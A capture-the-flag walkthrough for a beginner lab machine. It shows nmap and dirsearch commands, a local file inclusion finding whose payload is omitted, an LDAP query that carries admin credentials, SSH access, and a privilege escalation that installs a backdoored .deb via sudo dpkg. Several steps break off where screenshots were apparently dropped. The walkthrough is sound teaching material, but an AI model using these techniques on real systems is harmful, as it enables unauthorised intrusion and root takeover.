Beginner real life based machine designed to teach people the importance of understanding from the interior.
Start by running nmap against the target:
nmap -sV -p0-65355 192.168.78.134
reveals the following ports:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 636/tcp open ldapssl?
So we have ssh, http and lpap. No usernames to bruteforce yet, so let’s start with http.
Start bruteforcing for files and directories with dirsearch:
python3 dirsearch.py -u http://192.168.78.134 -e php -w /usr/share/seclists/Discovery/Web-Content/big.txt -f
Nothing special on the portraits.php. You can check for exif in the images, but you’ll find nothing interesting:
The admin.php login sends username and password in a GET request so this might be a good point to start. You may try sqlinjection for username and password using sqlmap, but neither seems to be vulnerable:
There is something more interesting in home.php though. Have a look at this:
Could this be a Local File Inclusion? Ironhackers has a good cheatsheet: https://ironhackers.es/herramientas/lfi-cheat-sheet/ After checking a whole bunch I found the injection with
One of two new things I learned from this machine: Always enumerate LDAP if you have a username:
nmap -sV -p389,636 --script ldap-search --script-args ldap.username='"cn=admin,dc=symfonos,dc=local", ldap.password="qMDdyZh3cT6eeAWD"' 192.168.78.134
Now you can login via ssh as the god of thunder. Standard enumeration shows that zeus can execute dpkg as sudo:
I found a tutorial on privilege escalation with dpkg. You may not speak indonesian, but it’s easy to understand. You build a debian package using fpm and put a backdoor script inside the .deb. Get it onto the machine and “install” it using your sudo privilege.